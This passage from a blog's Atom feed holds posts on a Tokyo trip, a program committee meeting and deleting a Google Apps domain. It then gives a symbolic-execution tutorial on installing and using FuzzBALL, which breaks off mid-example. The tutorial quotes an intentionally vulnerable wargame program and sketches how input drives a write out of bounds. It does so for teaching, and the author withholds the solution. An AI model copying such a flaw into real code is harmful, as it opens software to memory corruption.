revelation that nobody speaks English. All the signs are Japanese only
and if you don't know what the hotel will look like you have no way of
finding it. Luckily, I vaguely remembered the front of the hotel as they
showed a picture on the booking.com website (where I had booked more than a
month ago). The nice lady at the reception did not speak English either
but we were able to communicate with hand gestures. I was told that to
get the real Japanese experience I have to stay in a capsule hotel and
that's exactly what I did. The hotel was almost like a hostel with
shared bathrooms (including a hot tub!) and toilets but everybody got
his own capsule (these hotels are men only) with a little curtain. These
things are actually quite large, roughly the same size as a bunk bed, but
you get &amp;quot;some&amp;quot; privacy. This hotel also allowed me to experience
Japanese night time rituals. Men bathe together, and in Japan they don't
have standing showers; instead, you sit on a little box and fill a bucket
with water that you then pour over yourself. After washing yourself you
head to the tub and relax for a bit. After the bath you hop into a night
dress that consists of large shorts and a weird shirt. They actually had
to give me an extra extra large one (sorry, no pictures).&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2014/0329/IMAG0062.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;The next morning I got up early (thanks to the jetlag) and went to the
Tsukiji fish market, walked along the merchants and saw lots of tasty
fish. After this mouth watering experience I stopped at a local
restaurant and ate fresh tuna on rice. Again, the owner did not speak
English so I had to kind of show him what I wanted. I think the
Japanese don't really do breakfast as we know it and just eat a regular
meal in the morning. I must say it was very tasty!&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2014/0329/IMAG0038.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;After this great breakfast I headed out to Akihabara, the electric
town. According to the guide this is the place where Tokyo got the
&amp;quot;weird&amp;quot; attribute and I must say they sell a lot of crazy stuff there.
It was interesting to see the different electronics shops, and if I had
needed any new gadgets I would surely have found them there!&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2014/0329/IMAG0060.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;I walked through the district and northwards to the Ueno park area,
through a nice little market that sold other crazy stuff. This place
also had a lot of casinos where a lot of people were gambling. I watched
the different games for 10-15 minutes but could not tell whether they
were purely luck based or whether some skill was involved. The
interesting part was that these machines spit out little metal balls
that the players collected in large plastic containers. The gamblers were all
smoking like crazy and some of them had 10-20 boxes full of these balls
stacked behind them. That was one of the weirdest experiences but I did
not dare take a picture (privacy, you know).&lt;/p&gt;
&lt;p&gt;After reaching the park I saw that the cherry trees were in full bloom
and snapped a couple of nice pictures. I also experienced another
Japanese ritual. Some people reserve tarps under the cherry trees and
one guy waits (for hours) for all the others to show up. Then they eat
together under the trees and party.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2014/0329/IMAG0058.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="image4" src="/blog/static/2014/0329/IMAG0045.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="image5" src="/blog/static/2014/0329/IMAG0059.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;In the afternoon I explored the Tokyo national history museum. The
museum was not too exciting: they had lots of old stuff but almost
no English signs, which was a bit of a bummer. I looked at all the
exhibits, but without explanations it's only half the fun.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image6" src="/blog/static/2014/0329/IMAG0048.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;On my second day I visited the Imperial Palace. Basically it's a large
garden with some old structures, mostly guard houses. It was interesting
to see the architecture and to stroll around.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image7" src="/blog/static/2014/0329/IMAG0071.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="image8" src="/blog/static/2014/0329/IMAG0072.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;One of the fancy things in Tokyo is the hydration stations (hat tip to
Alessandro for naming them). Basically at every street corner and in
between you have vending machines that sell hot and cold drinks
for roughly a buck a pop. Of course I had to try a couple but most of
them were quite weird.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image9" src="/blog/static/2014/0329/IMAG0063.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;After exploring the palace I already had to head back to the airport.
The Japanese public transport system runs fairly well and once you have
had some time to adjust to the signs it is quite easy to follow. The
hardest part is that there are three different companies that run
different lines and it is not always easy to transfer. Back at the
airport I quickly checked in and headed to the lounge (as a privileged
traveller I get free food) and had a nice meal.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image10" src="/blog/static/2014/0329/IMAG0077.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Thanks Tokyo, you treated me well. You were crazy but not as crazy as I
expected. I had lots of fun, saw some interesting cultural rituals, some
temples and got a good overview of this city.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image11" src="/blog/static/2014/0329/IMAG0043.jpg" /&gt;&lt;/p&gt;
</content><category term="Leisure"></category><category term="travel"></category><category term="Tokyo"></category></entry><entry><title>Surviving your first non-virtual program committee meeting</title><link href="/blog/2014/0123-pc_meetings.html" rel="alternate"></link><published>2014-01-23T00:00:00-05:00</published><updated>2014-01-23T00:00:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-01-23:/blog/2014/0123-pc_meetings.html</id><summary type="html"></summary><content type="html">&lt;p&gt;Program committee (PC) meetings are a strange thing. As a graduate student you
will surely have experienced the outcome of PC meetings: a message telling
you that your paper got accepted, or the dreaded message that it got rejected
and you'll have to send it to another conference.&lt;/p&gt;
&lt;p&gt;But how does the review process itself work? During my time as a graduate
student and my time as a postdoctoral scholar I've had my fair share of rejects
and a good share of accepts, and I have always wondered how the decisions were
made in the background. I got my first insights into the process as an
external reviewer for my adviser, where I had to summarize papers and their
contributions for a set of conferences. Later in my studies, I got invited to
review some articles for journals where I have apparently become an expert.&lt;/p&gt;
&lt;p&gt;Only when I started my postdoctoral studies did I get invited to my first PCs,
starting with a systems conference (ACM SYSTOR'13 - thanks Mary and Dilma) and a
workshop (ACM PPREW'14 - thanks Todd). Unfortunately, the PC meetings for both
of these were only virtual, meaning that there was no real-world
meeting where all the papers were discussed; instead we used an online forum to
discuss which papers got accepted and which got rejected. Earlier this week I
finally went to my first real-world PC meeting, at IBM Watson in NY, to discuss
the program for the upcoming ACM VEE'14 conference (thanks Dilma and Dan for
thinking of me).&lt;/p&gt;
&lt;p&gt;For all these conferences the review process is surprisingly similar. First,
shortly after the submission deadline, the reviewers read through all the paper
titles and abstracts and bid on papers they want to review. I tend to group
papers into 4 sets, namely I want to review this paper, I could review this
paper, I don't care, and I don't want to review this paper. The system then
clusters all bids and suggests a selection of papers for each reviewer that the
program chairs can manually optimize. Second, the actual review phase lasts
between just a couple of days for small workshops and several weeks. In this
phase, the reviewers actually review the papers, write their reviews, adjust
their scores across all their papers, and submit the reviews into the submission
system. This process usually lasts until a couple of days before the PC
meeting. After submitting their reviews, the reviewers usually gain access to
the reviews of the other reviewers. Third, sometimes there is a rebuttal phase
where the authors get access to the latest version of the reviews and get a
chance to defend their work against the (usually anonymous) reviewers. The
fourth step is the actual PC meeting.&lt;/p&gt;
&lt;p&gt;In the meeting the merit of all submitted papers is discussed. In my first PC
meeting the chairs ordered the submissions into 3 groups: early accepts (papers
with only positive reviews), early rejects (papers with only negative reviews),
and the remaining papers. We voted to follow these suggestions, accepting the
positively reviewed papers and rejecting the negatively reviewed ones. All
remaining papers were discussed in detail. For each paper we had a discussion
lead who summarized the paper in 3-4 minutes, mentioning strengths and
weaknesses as identified by the individual reviewers. In the open discussion
that followed, the actual reviewers weighed in with their opinions first and
later all PC members were allowed to join the discussion. I enjoyed the open
atmosphere and we had some great technical discussions over some of the papers.
It was also really interesting to see the nuances of how different reviewers
judge the scientific contributions of a paper.&lt;/p&gt;
&lt;p&gt;So as not to embarrass myself I prepared well: I finished my reviews early (I
knew that I would get busy with the reviews for ASIACCS'14 in due time), wrote
up detailed reviews for each paper, read the reviews of the other PC members,
and followed the rebuttals that were added to the papers I reviewed. Before the
actual meeting I reread my reviews to page the discussion back into my mind and
prepared a quick summary for the papers where I was the discussion lead.&lt;/p&gt;
&lt;p&gt;Overall the discussion of my papers went well. The PC meeting itself ran for
roughly 8 hours with only a short lunch break in between. The discussion was
always on a very high level and it was great to see so many great minds running
in lockstep, discussing pro and contra arguments. In the end, there was only
one paper where the PC disagreed on whether we should accept or reject it, and
this conflict was resolved by a democratic vote.&lt;/p&gt;
&lt;p&gt;Some of the (sometimes obvious) lessons I have learned during this discussion
are:&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;PC meetings are a great place to network. For me it was a huge chance to
actually meet with many more senior people in academia and industry. It was
interesting to bring in my expertise and ask them about their thoughts (both
about the places where they work and their decision whether to choose
academia or industry).&lt;/li&gt;
&lt;li&gt;The double blind review process is really double blind. This fact actually
surprised me a little as I thought it would be handled in a more lax
fashion. For most of the papers I reviewed I had no clue who the
authors could be, and Erez and Dan did a great job of keeping the discussion
focused on the technical contributions of each work. I only saw the authors
of the accepted papers a couple of days after the PC meeting, after we had all
finished revising our reviews.&lt;/li&gt;
&lt;li&gt;The discussion itself is surprisingly open and honest. Nobody was pushing
their own work and all papers were evaluated in a fair and objective way.
Even though I was one of the academically youngest people, I was taken
seriously during the discussion. Somewhat surprisingly I was not just a silent
listener but an active participant who was frequently asked for his opinion.&lt;/li&gt;
&lt;li&gt;I liked the fact that the reviewer with the best evaluation had to summarize
the paper and all other reviews at the beginning of each discussion. This
gave me the opportunity to push the papers I really liked.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;All in all, I must say that I really enjoyed my first real PC meeting. I
learned first-hand how these things work; Erez and Dan did a great job of
leading the meeting and discussion while Martin did an awesome job of
organizing the meeting (and the following dinner).&lt;/p&gt;
</content><category term="Academia"></category><category term="program committee"></category><category term="research"></category><category term="conference"></category></entry><entry><title>A walkthrough for a difficult point and click adventure or deleting a GApps domain and all Google services</title><link href="/blog/2014/0122-leaving-the-cloud2.html" rel="alternate"></link><published>2014-01-22T00:00:00-05:00</published><updated>2014-01-22T00:00:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-01-22:/blog/2014/0122-leaving-the-cloud2.html</id><summary type="html">&lt;p class="first last"&gt;Deleting an old GApps account can result in infinite pain. Here's why.&lt;/p&gt;
</summary><content type="html">&lt;p&gt;A couple of months ago I &lt;a class="reference external" href="/blog/2013/1005-leaving-the-cloud.html"&gt;left the Google cloud&lt;/a&gt; and I have been happily using my own
services since then. My mailserver runs well, apart from the odd email that
does not get through because the origin domain is a registered spam sender
according to one of the blacklists (this has happened to two emails so far) and
one email that was just way too big (15MB of photos). The synchronization of calendar
and my contacts works well with all my laptops, notebooks, desktops, and the
odd Android device. Many things actually got much better: I have (much) faster
search (and I can use boolean operators - yay!); offline support for email
finally works well enough to actually work; outgoing messages are signed; and
did I say that it's actually much faster?&lt;/p&gt;
&lt;p&gt;The only thing left on Google was my &lt;a class="reference external" href="http://scholar.google.com/citations?user=7WGWw0gAAAAJ"&gt;Google scholar profile&lt;/a&gt;. Today I wanted to
move this final piece and remove the Google Apps account for my old
domain. I felt that my own cloud was a much better substitute for the
services that Google offered and that I would not need to fall back to GApps.
So I went off to delete the account, believing that Google would be a good guy
like they promise and let me delete my account in an easy process.&lt;/p&gt;
&lt;p&gt;First off, taking out all your data is a pain and you have to reserve at least
a couple of days if you want to pull a backup before deleting the account. The
Google takeout crashed several times (on the Google side), so all I got was a
non-descriptive error message that told me something failed on their side.
After the 4th or 5th try they managed to keep the job running long enough so
that I could pull the zip file - which I hopefully don't need but better one
backup too many than one too few.&lt;/p&gt;
&lt;p&gt;Then I set off to delete the GApps account this morning, trying to follow their
suggestion on the forum (well, I actually tried figuring it out myself but
there are just too many confusing options - almost like the Facebook privacy
settings). So I logged into the &lt;a class="reference external" href="http://admin.google.com"&gt;admin portal&lt;/a&gt; and
tried to find the option to delete the GApps account for my domain.&lt;/p&gt;
&lt;p&gt;The help page was actually way out of date and was written for the admin
console they had roughly around 2010, so none of the names they mentioned
existed any more. I kept searching for some time until I found that the gear
icon on the upper right showed &amp;quot;setup&amp;quot; as the only option. Well, it looks like
I have to set up this new console. So I clicked through the setup process
(trying to deselect as many services as I could). After going through the setup
process of the new console I had a second option under the gear icon that
allowed me to switch back to the old console view.&lt;/p&gt;
&lt;p&gt;At this point in time it started to feel like one of these old point and click
adventures (e.g., Monkey Island or Myst) where you're trapped somewhere and you
need to fulfill a task. So I continued my journey.&lt;/p&gt;
&lt;p&gt;I followed the help page (which is written for the old console view that you
can only activate if you go through the setup process for the new console view
that you'll only find if you click on the setup link when you open the gear
icon, modulo one or two logouts/logins). And I finally found the &amp;quot;delete this
account&amp;quot; link.&lt;/p&gt;
&lt;p&gt;But behold, the journey is not over yet. Because you actually cannot click on
this link. There is some text in small font that tells you that you have to
unsubscribe from GApps first, before you can delete the domain account (which
is not mentioned in the help). So I followed through to the next level and
unsubscribed my admin account (the only account left in the domain) from the
GApps services. This promptly dropped me to a couple of internal server error
pages and logged me out of the GApps admin panel.&lt;/p&gt;
&lt;p&gt;When I signed in again (using the same login and password which tells me that
Google did not really delete my account), I had to agree to the Google EULA and
a couple of other things and solve a captcha. I like these mini games in
adventures.&lt;/p&gt;
&lt;p&gt;After successfully logging back into the admin console I was able to switch to
the classic view and navigate back to the delete this domain link. And lo and
behold this time the link was active and I was able to (hopefully?) delete the
admin account for the domain, and the domain account.&lt;/p&gt;
&lt;p&gt;All in all, I have to say that this was one of the tougher adventures I had to
solve, especially as I expected an easier path. Looking back I should have
taken pictures for each step. I wonder what all the UI designers at Google do
all day long when their admin interfaces are so convoluted and crappy. But
well, maybe they just want you to have fun with their adventures and mini games.&lt;/p&gt;
</content><category term="Security"></category><category term="cloud"></category><category term="privacy"></category><category term="security"></category><category term="self-hosted"></category></entry><entry><title>Having phun with Symbolic Execution (SE)</title><link href="/blog/2014/0114-having_phun_with_SE.html" rel="alternate"></link><published>2014-01-14T00:00:00-05:00</published><updated>2014-01-14T00:00:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-01-14:/blog/2014/0114-having_phun_with_SE.html</id><summary type="html">&lt;p class="first last"&gt;An introduction article that explains what symbolic execution is and how it can be chained to trigger vulnerabilities hidden deep inside binaries.&lt;/p&gt;
</summary><content type="html">&lt;p&gt;This year at &lt;a class="reference external" href="https://events.ccc.de/congress/2013/wiki/Main_Page"&gt;30c3&lt;/a&gt; I
gave a talk about &lt;a class="reference external" href="https://nebelwelt.net/publications/files/13CCC-presentation.pdf"&gt;triggering deep vulnerabilities using symbolic execution&lt;/a&gt;. The talk gives an overview
about symbolic execution and shows how you can use symbolic execution as a new
tool in your reverse engineering toolbox. Let's say you have a specific
location in a binary and you want to know what kind of input can trigger a
specific fault at that location. If you configure it correctly then symbolic
execution can help you find that input.&lt;/p&gt;
&lt;p&gt;This post starts with a general description of what symbolic execution is and
then goes into detail on how to install FuzzBALL, our symbolic execution
engine. In the end I present some examples of how you can use FuzzBALL (which is
a fairly complex tool, so new users usually have a rough start).&lt;/p&gt;
&lt;div class="section" id="symbolic-execution-se"&gt;
&lt;h2&gt;Symbolic Execution (SE)&lt;/h2&gt;
&lt;p&gt;Symbolic Execution, or SE for short, is an alternative way to execute code
(programs, binaries, drivers, or even full operating systems). Instead of using
specific concrete values, SE uses abstract, symbolic values for register and
memory values. Operations on these values are carried along the symbolic
execution of the code. Think of symbolic execution as a form of execution that
concatenates the different computations on a value into a long formula.&lt;/p&gt;
&lt;p&gt;At decision points or control flow transfers that depend on symbolic values
(e.g., conditional jumps when the flags depend on symbolic values, or indirect
control flow transfer when the address or pointer is symbolic) symbolic
execution must follow all possible paths. For conditional jumps, the symbolic
execution engine splits the execution into two paths. On one path the SE engine
assumes that the branch condition is true and on the other path the SE engine
assumes a false branch condition, extending the symbolic formulas with this
information.&lt;/p&gt;
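&lt;p&gt;To make the forking concrete, here is a tiny, illustrative Python sketch
(not FuzzBALL code): it brute-forces a single symbolic byte against the
accumulated path constraints, which a real SE engine would instead hand to a
constraint solver.&lt;/p&gt;

```python
# Illustrative sketch of path forking over one symbolic byte.
# A real SE engine queries an SMT solver instead of enumerating all values.

def satisfying(constraints):
    """All concrete byte values that satisfy every accumulated constraint."""
    return [x for x in range(256) if all(c(x) for c in constraints)]

# Program under "symbolic execution":
#   if (x > 10) { if (x == 42) bug(); }
# Each conditional forks the path and extends the constraint list.
path_bug = [lambda x: x > 10, lambda x: x == 42]     # both branches taken
path_no_bug = [lambda x: x > 10, lambda x: x != 42]  # inner branch false
path_skip = [lambda x: not x > 10]                   # outer branch false

print(satisfying(path_bug))   # [42] -- concrete input reaching bug()
total = (len(satisfying(path_bug)) + len(satisfying(path_no_bug))
         + len(satisfying(path_skip)))
print(total)                  # 256 -- the three paths partition all inputs
```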
&lt;p&gt;The SE engine can prove whether a specific condition holds at a specific
location. When using SE, the programmer encodes a set of conditions that should
be checked at one or more locations. If the SE engine finds a symbolic state
that satisfies such a condition, it can calculate one or more concrete
inputs that trigger the vulnerability condition by solving the path formulas.&lt;/p&gt;
&lt;p&gt;A common problem of SE engines is their limited scalability. Due to the
exponential path explosion explained above (at each conditional branch that
depends on symbolic input the number of paths is doubled) the number of
symbolic input bytes and the amount of code that can be executed symbolically
is limited.&lt;/p&gt;
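&lt;p&gt;The doubling is easy to quantify with some back-of-the-envelope arithmetic
(plain Python, nothing FuzzBALL-specific):&lt;/p&gt;

```python
# Each conditional branch that depends on symbolic input doubles the
# number of paths, so n such branches yield 2**n paths in the worst case.
def worst_case_paths(symbolic_branches):
    return 2 ** symbolic_branches

for n in (10, 20, 30):
    print(n, worst_case_paths(n))
# Already at 30 symbolic-dependent branches there are over a billion
# paths -- which is why the number of symbolic bytes must stay small.
```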
&lt;/div&gt;
&lt;div class="section" id="different-se-engines"&gt;
&lt;h2&gt;Different SE engines&lt;/h2&gt;
&lt;p&gt;Several different SE engines exist and they are all tailored to different use
cases. &lt;a class="reference external" href="http://bitblaze.cs.berkeley.edu/fuzzball.html"&gt;FuzzBALL&lt;/a&gt; is a SE
engine that can be used to execute arbitrary binary code. At the core, code is
translated into a high-level intermediate representation (using VEX and Vine)
and conditions can be encoded on the binary level. FuzzBALL is used to generate
proof of concept exploits (an input that triggers a bug) given a vulnerability
condition in the application. &lt;a class="reference external" href="http://ccadar.github.io/klee/"&gt;KLEE&lt;/a&gt; is a SE
engine that compiles programs into LLVM intermediate representation
(therefore relies on the source code of the application) and tests if it can
trigger a vulnerability condition. KLEE is used to find bugs in applications.
&lt;a class="reference external" href="http://dslab.epfl.ch/proj/s2e"&gt;S2E&lt;/a&gt; builds on KLEE and selectively executes
large systems symbolically. The goal of S2E is similar to KLEE but on a larger
scale in the amount of code that is executed in one instance (KLEE, in turn, is
well suited to large scale analyses of many smaller programs, e.g., the
binutils), with its main contribution being the choice of which paths to
analyze. Next to these three systems there is some prior and a lot of follow-up
work. The goal of this blog post is not to go into too much detail but the
interested reader can take the FuzzBALL, KLEE, and S2E papers as a start and
explore from there.&lt;/p&gt;
&lt;p&gt;I just highlighted 3 different SE engines and there are many more. In addition,
many engines support different SMT solvers that can also be tailored to
different use cases. Just the question of choosing the right SE engine for a
task would merit a couple of blog posts.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="setting-up-an-se-environment"&gt;
&lt;h2&gt;Setting up an SE environment&lt;/h2&gt;
&lt;p&gt;For the rest of this blog post we will concentrate on the FuzzBALL symbolic
execution engine (the one I know best). FuzzBALL currently runs on any x86-32
system (or x86-64 with x86-32 backward compatibility libraries) and is easy to
set up on any Debian-based host. You can also follow the great INSTALL file in
the FuzzBALL repository.&lt;/p&gt;
&lt;p&gt;Use the following magic commands to install the necessary build tools:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
$ sudo apt-get install build-essential valgrind qemu binutils-multiarch \
                       binutils-dev ocaml ocaml-findlib libgdome2-ocaml-dev \
                       camlidl libextlib-ocaml-dev ocaml-native-compilers \
                       libocamlgraph-ocaml-dev libsqlite3-ocaml-dev \
                       subversion git libgmp3-dev automake
$ sudo apt-get build-dep binutils-multiarch ocaml
&lt;/pre&gt;
&lt;p&gt;Download a set of necessary repositories:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
$ cd ~; mkdir SE; cd SE
$ git clone https://github.com/bitblaze-fuzzball/fuzzball
$ svn co -r2737 svn://svn.valgrind.org/vex/trunk vex-r2737
$ cd vex-r2737; make -f Makefile-gcc
$ cd ..
$ svn co -r1673 https://svn.code.sf.net/p/stp-fast-prover/code/trunk/stp  stp-r1673
$ cd stp-r1673; patch -p0 &amp;lt;../fuzzball/stp/stp-r1668-true-ce.patch
$ ./clean-install.sh --with-prefix=$(pwd)/install
$ cp install/bin/stp install/lib/libstp.a ../fuzzball/stp
$ cd ../fuzzball
$ ./autogen.sh
$ ./configure --with-vex=`pwd`/../vex-r2737
$ make
&lt;/pre&gt;
&lt;p&gt;And you should be done and have a readily compiled version of FuzzBALL with all
the libraries you will need for x86-32 symbolic execution.&lt;/p&gt;
&lt;p&gt;Now download and install the examples from &lt;a class="reference external" href="/blog/static/2014/0114/SE-testbed.tar.bz2"&gt;here&lt;/a&gt; and unpack
them in our playground:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
$ cd ~/SE; mkdir playground; cd playground
$ wget -c https://nebelwelt.net/blog/static/2014/0114/SE-testbed.tar.bz2
$ tar -xvjf SE-testbed.tar.bz2
&lt;/pre&gt;
&lt;/div&gt;
&lt;div class="section" id="our-first-symbolically-executed-piece-of-code"&gt;
&lt;h2&gt;Our first symbolically executed piece of code&lt;/h2&gt;
&lt;p&gt;Now after we have initialized and compiled our execution environment it's time
to execute our first piece of code symbolically. Enter the SE directory and
change to the first code example:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
$ cd ~/SE/playground/simple
$ make
$ ./run_se.sh
&lt;/pre&gt;
&lt;p&gt;What's actually happening there? Well, let's start with the actual code:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
#define MAGIC 42
// add some concrete values into the process memory
char arr[256];
for (i=0; i&amp;lt;256; i++)
    arr[i] = i;
// buf0[0] is symbolic
// copy the concrete value from arr[symb] into buf0[42]
buf0[42] = arr[buf0[0]];

// check if the copied value was the magic value defined above
if (buf0[42] == MAGIC) {
            printf(&amp;quot;Correctly recovered value 42\n&amp;quot;);
}
&lt;/pre&gt;
&lt;p&gt;So, if we assume that &lt;tt class="docutils literal"&gt;buf0&lt;/tt&gt; is symbolic and somewhat input dependent, what
kind of value do we need to place in &lt;tt class="docutils literal"&gt;buf0[0]&lt;/tt&gt; to trigger the printf statement?
This example may look a little bit hypothetical and constructed (and it is) but
it illustrates an interesting use case for FuzzBALL. We have some (binary)
program and a pre-defined condition that we want to trigger. The FuzzBALL SE
engine is then used to produce a concrete input (e.g., a specific memory
buffer, or a file) that triggers the pre-defined condition.&lt;/p&gt;
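&lt;p&gt;For this toy example we can even check the expected answer concretely. The
following Python sketch re-implements the C snippet above and enumerates the
symbolic byte, confirming which input FuzzBALL should report:&lt;/p&gt;

```python
# Concrete re-implementation of the simple example: arr[i] == i, so
# buf0[42] = arr[buf0[0]] equals the magic value 42 exactly when the
# symbolic byte buf0[0] is 42 itself.
MAGIC = 42
arr = list(range(256))  # arr[i] = i

def triggers(symbolic_byte):
    buf0 = [0] * 256
    buf0[0] = symbolic_byte
    buf0[42] = arr[buf0[0]]
    return buf0[42] == MAGIC

solutions = [b for b in range(256) if triggers(b)]
print(solutions)  # [42]
```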
&lt;p&gt;FuzzBALL supports a large set of configuration and runtime options and I invite
you to look at them using &lt;tt class="docutils literal"&gt;./fuzzball/exec_utils/fuzzball &lt;span class="pre"&gt;-h&lt;/span&gt;&lt;/tt&gt;. In our example
directory we have conveniently set up a config file and a run script that then
uses this config file. In the config file we specify the locations and basic
settings for FuzzBALL. In the run script we specify the runtime configuration
for FuzzBALL. For the simple example we use the following parameters:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
-random-seed $NUMBER (FuzzBALL uses random values, a common seed makes the choices reproducible)
--solver stpvc (we use the STP constraint solver)
-linux-syscalls (we emulate linux system calls)
-fuzz-start-addr (concrete execution until SE starts at this address)
-fuzz-end-addr (SE ends at this address)
-symbolic-region 0xc0fe0000+1 (one symbolic byte at address 0xc0fe0000)
-check-condition-at (encodes the location and the condition)
-finish-on-nonfalse-cond (stop SE as soon as we find a satisfying input)
&lt;/pre&gt;
&lt;p&gt;The most important arguments are &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;fuzz-start-addr&lt;/span&gt;&lt;/tt&gt; and &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;fuzz-end-addr&lt;/span&gt;&lt;/tt&gt;, as they
delimit where the magic happens, and &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;symbolic-region&lt;/span&gt;&lt;/tt&gt;, which defines
which values are tracked symbolically rather than concretely.&lt;/p&gt;
&lt;p&gt;The condition is checked at a specific location (or at multiple locations) and
can check the values of registers or memory locations. In the simple example we
use &lt;tt class="docutils literal"&gt;&amp;quot;0xc0de:R_EAX:reg32_t == 0x2A:reg32_t&amp;quot;&lt;/tt&gt;. This condition checks if the
32-bit register EAX contains the 32-bit value 0x2A when the instruction pointer
is at the location 0xc0de. You can play around with the conditions and look at
the machine code of the simple example as well (&lt;tt class="docutils literal"&gt;objdump &lt;span class="pre"&gt;-d&lt;/span&gt; ./simple&lt;/tt&gt;). Play
around with some FuzzBALL options and try to trigger different values or
different conditions.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="getting-a-little-help-for-some-vortex-wargames"&gt;
&lt;h2&gt;Getting a little help for some Vortex wargames&lt;/h2&gt;
&lt;p&gt;The &lt;a class="reference external" href="http://www.overthewire.org/wargames/vortex/vortex1.shtml"&gt;Vortex wargames&lt;/a&gt; are an awesome way
to learn more about system security. In a bunch of different levels you learn
about different aspects of system security and software vulnerabilities. You
have to understand the concepts, write some code, and exploit these
vulnerabilities to reach levels higher up. I really recommend that you try them
out to see how far you can go.&lt;/p&gt;
&lt;p&gt;For some of the levels SE can be used to simplify the process of exploiting the
given vulnerabilities (some jokingly say without even understanding the core
vulnerability). In this part we look at Vortex level 01 where we have a simple
program that reads some input from stdin:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
unsigned char buf[512];
unsigned char *ptr = buf + (sizeof(buf)/2);
...
while((x = getchar()) != EOF) {
  switch(x) {
    case '\n': print(buf, sizeof(buf)); continue; break;
    case '\\': ptr--; break;
    default: e(); if(ptr &amp;gt; buf + sizeof(buf)) continue;
             ptr++[0] = x; break;
   }
 }
&lt;/pre&gt;
&lt;p&gt;The experienced hacker will see that this code defines a simple state machine
that can be used to trigger the vulnerability condition hidden in &lt;tt class="docutils literal"&gt;e()&lt;/tt&gt;. But
let's try not to think too hard and use a brute-force SE approach.&lt;/p&gt;
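&lt;p&gt;Before firing up the SE engine it can help to replay candidate inputs
against a concrete model of the loop. The following Python sketch mimics the
pointer arithmetic of the snippet above (&lt;tt class="docutils literal"&gt;e()&lt;/tt&gt; and the print are stubbed out,
and the buffer size is the original 512 bytes); note that only the upper bound
of the pointer is ever checked:&lt;/p&gt;

```python
# Concrete simulator of the vortex state machine above (sketch).
# Returns the buffer-relative offsets that the input would write to.
BUF_SIZE = 512

def written_offsets(inp):
    ptr = BUF_SIZE // 2        # ptr = buf + sizeof(buf)/2
    writes = []
    for x in inp:
        if x == '\n':
            pass               # print(buf, sizeof(buf)); nothing written
        elif x == '\\':
            ptr -= 1           # ptr--; no lower-bound check!
        else:
            if ptr > BUF_SIZE: # only the upper bound is checked
                continue
            writes.append(ptr) # ptr++[0] = x
            ptr += 1
    return writes

# Enough backslashes move ptr below the start of the buffer, so the next
# character is written out of bounds, in front of buf:
print(written_offsets('\\' * 300 + 'A'))  # [-44]
```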
&lt;p&gt;We setup the SE engine in playground/vortex:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
$ cd ~/SE/playground/vortex
$ make
$ ./run_se.sh
&lt;/pre&gt;
&lt;p&gt;If your GCC decides to use a weird stack layout (well, some GCC optimizations
tend to reorder the variables on the stack, mitigating the intended exploit)
then you can use my precompiled versions of the binaries (&lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;static-vortex&lt;/span&gt;&lt;/tt&gt; and
&lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;run_se-static.sh&lt;/span&gt;&lt;/tt&gt;).&lt;/p&gt;
&lt;p&gt;We have modified the original vortex source code in some small places. The
sestart and sestop function calls are added to make the binary grepable (your
gcc might generate different code, and the calls to these non-inlineable
functions allow me to more conveniently search for the SE start address). Also,
we made the buffer smaller, reducing the difficulty of the problem. We can then
use the SE-generated result to abstract the solution and
adapt it to larger buffers as well (or we let the SE run for a longer amount of
time). This example already gives us a good feel for the scalability issues
that SE faces: if we use more than 10-20 symbolic bytes, we reach the
scalability boundaries.&lt;/p&gt;
&lt;p&gt;I don't want to spoil the fun too much and give you the exact results, so I
hope that you play around a little with the binaries and enjoy solving this
vortex level.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="splitting-se-along-transformation-boundaries-pdf-encodings"&gt;
&lt;h2&gt;Splitting SE along transformation boundaries: PDF encodings&lt;/h2&gt;
&lt;p&gt;The last example takes a real program that we have only in binary form. We look
at a binary that decodes a HEX string first and then does a RLE decompression
on the output of the first transformation. The code would look a little bit
like:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
ASCIIHexDecode(buf0, len0, buf1, 4096);
if (RunLengthDecode(buf1, len1, buf2, 4096) != -1) {
  if (strncmp(argv[3], (char*)buf2, strlen(argv[3])) == 0) {
     buf0[len0] = 0;
     buf1[len1] = 0;
     buf2[strlen(argv[3])] = 0;
     printf(&amp;quot;Correctly recovered str\n&amp;quot;);
  }
}
&lt;/pre&gt;
